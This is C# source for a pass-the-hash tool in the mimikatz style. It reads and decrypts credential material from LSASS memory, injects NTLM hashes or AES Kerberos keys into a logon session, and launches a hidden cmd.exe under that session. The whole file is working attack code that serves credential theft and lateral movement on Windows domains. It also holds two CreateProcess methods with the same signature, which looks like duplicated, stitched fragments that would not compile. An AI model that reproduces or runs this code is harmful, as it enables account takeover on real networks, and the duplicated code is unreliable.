private static void Pth_luid(IntPtr hProcess, IntPtr lsasrvMem, IntPtr kerberos, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, ref Pth.SEKURLSA_PTH_DATA data)
{
List <Logon> logonlist = new List <Logon>();
LogonSessions.FindCredentials(hProcess, lsasrvMem, oshelper, iv, aeskey, deskey, logonlist);
Msv1.WriteMsvCredentials(hProcess, oshelper, iv, aeskey, deskey, logonlist, ref data);
List <KerberosLogonItem> klogonlist = SharpKerberos.FindCredentials(hProcess, kerberos, oshelper, iv, aeskey, deskey, logonlist);
foreach (KerberosLogonItem s in klogonlist)
{
SharpKerberos.WriteKerberosKeys(ref hProcess, s, oshelper, iv, aeskey, deskey, ref data);
}
}
public static int CreateProcess(IntPtr hProcess, IntPtr lsasrvMem, IntPtr kerberos, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, string user, string domain, string ntlmHash = null, string aes128 = null, string aes256 = null, string rc4 = null, string binary = "cmd.exe", string arguments = "", string luid = null, bool impersonate = false)
{
TOKEN_STATISTICS tokenStats = new TOKEN_STATISTICS();
byte[] aes128bytes = null;
byte[] aes256bytes = null;
Pth.SEKURLSA_PTH_DATA data = new Pth.SEKURLSA_PTH_DATA();
byte[] ntlmHashbytes = null;
int procid;
if (!string.IsNullOrEmpty(luid))
{
tokenStats.AuthenticationId.HighPart = 0;
tokenStats.AuthenticationId.LowPart = uint.Parse(luid);
data.LogonId = tokenStats.AuthenticationId;
}
else
{
if (string.IsNullOrEmpty(user))
{
Console.WriteLine("[x] Missing required parameter user");
return(1);
}
if (string.IsNullOrEmpty(domain))
{
Console.WriteLine("[x] Missing required parameter domain");
return(1);
}
}
try
{
if (!string.IsNullOrEmpty(aes128))
{
aes128bytes = Utility.StringToByteArray(aes128);
if (aes128bytes.Length != AES_128_KEY_LENGTH)
{
throw new System.ArgumentException();
}
data.Aes128Key = aes128bytes;
Console.WriteLine("[*] AES128\t: {0}", Utility.PrintHexBytes(aes128bytes));
}
}
catch (Exception)
{
Console.WriteLine("[x] Invalid aes128 key");
return(1);
}
try
{
if (!string.IsNullOrEmpty(aes256))
{
aes256bytes = Utility.StringToByteArray(aes256);
if (aes256bytes.Length != AES_256_KEY_LENGTH)
{
throw new System.ArgumentException();
}
data.Aes256Key = aes256bytes;
Console.WriteLine("[*] AES256\t: {0}", Utility.PrintHexBytes(aes256bytes));
}
}
catch (Exception)
{
Console.WriteLine("[x] Invalid aes128 key");
return(1);
}
try
{
if (!string.IsNullOrEmpty(rc4))
{
ntlmHashbytes = Utility.StringToByteArray(rc4);
}
if (!string.IsNullOrEmpty(ntlmHash))
{
ntlmHashbytes = Utility.StringToByteArray(ntlmHash);
}
if (ntlmHashbytes.Length != Msv1.LM_NTLM_HASH_LENGTH)
{
throw new System.ArgumentException();
}
data.NtlmHash = ntlmHashbytes;
}
catch (Exception)
{
Console.WriteLine("[x] Invalid Ntlm hash/rc4 key");
return(1);
}
if (data.NtlmHash != null || data.Aes128Key != null || data.Aes256Key != null)
{
if (!string.IsNullOrEmpty(luid))
{
Pth_luid(hProcess, lsasrvMem, kerberos, oshelper, iv, aeskey, deskey, ref data);
}
else if (!string.IsNullOrEmpty(user))
{
//pipe for stdin and stdout
var saHandles = new SECURITY_ATTRIBUTES();
saHandles.nLength = Marshal.SizeOf(saHandles);
saHandles.bInheritHandle = true;
saHandles.lpSecurityDescriptor = IntPtr.Zero;
IntPtr hStdOutRead;
IntPtr hStdOutWrite;
IntPtr hStdInRead;
IntPtr hStdInWrite;
// StdOut pipe
CreatePipe(out hStdOutRead, out hStdOutWrite, ref saHandles, 999999);
SetHandleInformation(hStdOutRead, HANDLE_FLAGS.INHERIT, 0);
// StdIn pipe
CreatePipe(out hStdInRead, out hStdInWrite, ref saHandles, 999999);
SetHandleInformation(hStdInWrite, HANDLE_FLAGS.INHERIT, 0);
//
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
STARTUPINFOEX si = new STARTUPINFOEX();
si.StartupInfo.cb = (uint)Marshal.SizeOf(typeof(STARTUPINFOEX));
si.StartupInfo.hStdInput = hStdInRead;
si.StartupInfo.hStdErr = hStdOutWrite;
si.StartupInfo.hStdOutput = hStdOutWrite;
si.StartupInfo.dwFlags = 0x00000001 | 0x00000100;
si.StartupInfo.wShowWindow = 0x0000;
if (!Win32.Natives.CreateProcessWithLogonW(user, "", domain, LogonFlags.NetCredentialsOnly, @"C:\Windows\System32\cmd.exe", @"C:\Windows\System32\cmd.exe", CreationFlags.CREATE_SUSPENDED, 0, @"C:\Windows\System32\", ref si, out pi))
{
procid = pi.dwProcessId;
IntPtr hToken = IntPtr.Zero;
if (OpenProcessToken(pi.hProcess, TOKEN_READ | (impersonate ? TOKEN_DUPLICATE : 0), out hToken))
{
IntPtr hTokenInformation = Marshal.AllocHGlobal(Marshal.SizeOf(tokenStats));
Marshal.StructureToPtr(tokenStats, hTokenInformation, false);
uint retlen = 0;
if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenStatistics, hTokenInformation, (uint)Marshal.SizeOf(tokenStats), out retlen))
{
tokenStats = (TOKEN_STATISTICS)Marshal.PtrToStructure(hTokenInformation, typeof(TOKEN_STATISTICS));
data.LogonId = tokenStats.AuthenticationId;
Pth_luid(hProcess, lsasrvMem, kerberos, oshelper, iv, aeskey, deskey, ref data);
if (data.isReplaceOk)
{
NtResumeProcess(pi.hProcess);
WriteToPipe(hStdInWrite, "/c whoami");
Console.WriteLine(ReadFromPipe(pi.hProcess, hStdOutRead, Encoding.GetEncoding(GetConsoleOutputCP())));
return(procid);
}
else
{
NtTerminateProcess(pi.hProcess, (uint)NTSTATUS.ProcessIsTerminating);
}
}
else
{
Console.WriteLine("[x] Error GetTokenInformazion");
return(1);
}
}
else
{
Console.WriteLine("[x] Error open process");
return(1);
}
}
else
{
Console.WriteLine("[x] Error process create");
return(1);
}
}
else
{
Console.WriteLine("[x] Bad user or LUID");
return(1);
}
}
else
{
Console.WriteLine("[x] Missing at least one argument : ntlm/rc4 OR aes128 OR aes256");
return(1);
}
return(0);
}
public static int CreateProcess(IntPtr hProcess, IntPtr lsasrvMem, IntPtr kerberos, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, string user, string domain, string ntlmHash = null, string aes128 = null, string aes256 = null, string rc4 = null, string binary = "cmd.exe", string arguments = "", string luid = null, bool impersonate = false)
{
TOKEN_STATISTICS tokenStats = new TOKEN_STATISTICS();
byte[] aes128bytes = null;
byte[] aes256bytes = null;
Pth.SEKURLSA_PTH_DATA data = new Pth.SEKURLSA_PTH_DATA();
byte[] ntlmHashbytes = null;
int procid;
if (!string.IsNullOrEmpty(luid))
{
tokenStats.AuthenticationId.HighPart = 0;
tokenStats.AuthenticationId.LowPart = uint.Parse(luid);
data.LogonId = tokenStats.AuthenticationId;
}
else
{
if (string.IsNullOrEmpty(user))
{
Console.WriteLine("[x] Missing required parameter user");
return(1);
}
if (string.IsNullOrEmpty(domain))
{
Console.WriteLine("[x] Missing required parameter domain");
return(1);
}
}
try
{
if (!string.IsNullOrEmpty(aes128))
{
aes128bytes = Utility.StringToByteArray(aes128);
if (aes128bytes.Length != AES_128_KEY_LENGTH)
{
throw new System.ArgumentException();
}
data.Aes128Key = aes128bytes;
Console.WriteLine("[*] AES128\t: {0}", Utility.PrintHexBytes(aes128bytes));
}
}
catch (Exception)
{
Console.WriteLine("[x] Invalid aes128 key");
return(1);
}
try
{
if (!string.IsNullOrEmpty(aes256))
{
aes256bytes = Utility.StringToByteArray(aes256);
if (aes256bytes.Length != AES_256_KEY_LENGTH)
{
throw new System.ArgumentException();
}
data.Aes256Key = aes256bytes;
Console.WriteLine("[*] AES256\t: {0}", Utility.PrintHexBytes(aes256bytes));
}
}
catch (Exception)
{
Console.WriteLine("[x] Invalid aes128 key");
return(1);
}
try
{
if (!string.IsNullOrEmpty(rc4))
{
ntlmHashbytes = Utility.StringToByteArray(rc4);
}
if (!string.IsNullOrEmpty(ntlmHash))
{
ntlmHashbytes = Utility.StringToByteArray(ntlmHash);
}
if (ntlmHashbytes.Length != Msv1.LM_NTLM_HASH_LENGTH)
{
throw new System.ArgumentException();
}
data.NtlmHash = ntlmHashbytes;
}
catch (Exception)
{
Console.WriteLine("[x] Invalid Ntlm hash/rc4 key");
return(1);
}
if (data.NtlmHash != null || data.Aes128Key != null || data.Aes256Key != null)
{
if (!string.IsNullOrEmpty(luid))
{
Pth_luid(hProcess, lsasrvMem, kerberos, oshelper, iv, aeskey, deskey, ref data);
}
else if (!string.IsNullOrEmpty(user))
{
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
if (CreateProcessWithLogonW(user, "", domain, @"C:\Windows\System32\", binary, arguments, CreationFlags.CREATE_SUSPENDED, ref pi))
{
procid = pi.dwProcessId;
IntPtr hToken = IntPtr.Zero;
if (OpenProcessToken(pi.hProcess, TOKEN_READ | (impersonate ? TOKEN_DUPLICATE : 0), out hToken))
{
IntPtr hTokenInformation = Marshal.AllocHGlobal(Marshal.SizeOf(tokenStats));
Marshal.StructureToPtr(tokenStats, hTokenInformation, false);
uint retlen = 0;
if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenStatistics, hTokenInformation, (uint)Marshal.SizeOf(tokenStats), out retlen))
{
tokenStats = (TOKEN_STATISTICS)Marshal.PtrToStructure(hTokenInformation, typeof(TOKEN_STATISTICS));
data.LogonId = tokenStats.AuthenticationId;
Pth_luid(hProcess, lsasrvMem, kerberos, oshelper, iv, aeskey, deskey, ref data);
if (data.isReplaceOk)
{
NtResumeProcess(pi.hProcess);
return(procid);
}
else
{
NtTerminateProcess(pi.hProcess, (uint)NTSTATUS.ProcessIsTerminating);
}
}
else
{
Console.WriteLine("[x] Error GetTokenInformazion");
return(1);
}
}
else
{
Console.WriteLine("[x] Error open process");
return(1);
}
}
else
{
Console.WriteLine("[x] Error process create");
return(1);
}
}
else
{
Console.WriteLine("[x] Bad user or LUID");
return(1);
}
}
else
{
Console.WriteLine("[x] Missing at least one argument : ntlm/rc4 OR aes128 OR aes256");
return(1);
}
return(0);
}
